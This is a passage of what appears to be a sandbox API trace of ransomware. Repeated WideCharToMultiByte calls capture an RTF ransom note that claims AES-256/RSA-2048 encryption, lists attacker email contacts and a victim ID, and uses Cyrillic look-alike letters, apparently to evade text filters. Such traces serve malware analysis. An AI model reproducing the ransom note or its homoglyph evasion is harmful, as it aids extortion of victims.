d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0079.027] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0079.027] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x25ad0d8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s 